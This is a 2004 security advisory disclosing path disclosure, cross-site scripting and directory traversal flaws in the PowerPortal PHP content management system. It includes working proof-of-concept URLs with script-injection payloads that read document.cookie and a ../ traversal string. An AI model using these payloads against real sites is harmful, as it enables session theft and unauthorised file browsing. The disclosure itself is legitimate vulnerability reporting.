http://www.swp-zone.org/archivos/advisory-07.txt

------------------------------------------------------------------------
-------------------------

:.: Multiple vulnerabilities PowerPortal :.:

PROGRAM: PowerPortal
HOMEPAGE: http://powerportal.sourceforge.net/
VERSION: v1.x
BUG: Multiple vulnerabilities
DATE: 23/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho (at) peru (dot) com [email concealed]

------------------------------------------------------------------------
-------------------------

1.- Affected software description:
------------------------------

PowerPortal is a popular content management system, written in php

2.- Vulnerabilities:
---------------

A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.

:.: Examples:

* http://attacker/modules/gallery/resize.php

<br />
<b>Warning</b>: imagecreatetruecolor(): Invalid image dimensions in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>18</b><br />
<br />
<b>Warning</b>: imagecopyresized(): supplied argument is not a
valid Image resource in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>20</b><br />
<br />
<b>Warning</b>: imagejpeg(): supplied argument is not a valid Image
resource in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>23</b><br />

* http://attacker/power/modules.php?name=gallery&files=darkbicho

Warning:
opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/image
s/darkbicho):
failed to open dir: Invalid argument in
c:\appserv\www\power\modules\gallery\index.php on
line 99

B. Cross-Site Scripting aka XSS:

http://attacker/modules.php?name=private_messages&file=reply&id='><scrip
t>alert(document.cookie);</script>
http://attacker/modules.php?name=links&search=<script>alert(document.coo
kie);</script>&func=search_results
http://attacker/modules.php?name=content&file=search&search=<script>aler
t(document.cookie);</script>&func=results
http://attacker/modules.php?name=gallery&files=<script>alert(document.co
okie);</script>

C. Arbitrary directory browsing:

* http://attacker/modules.php?name=gallery&files=/../../../

3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PowerPortal website for updates and official release
details.

4.- Greetings:
---------

greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"

5.- Contact
-------

WEB: http://www.darkbicho.tk
EMAIL: darkbicho (at) peru (dot) com [email concealed]

------------------------------------------------------------------------
-------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/

Security Wari Projects
(c) 2002 - 2004
Made in Peru

----------------------------------------[ EOF
]----------------------------------------------
 

  

  

DarkBicho

Web: http://www.darkbicho.tk

"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------

[ reply ]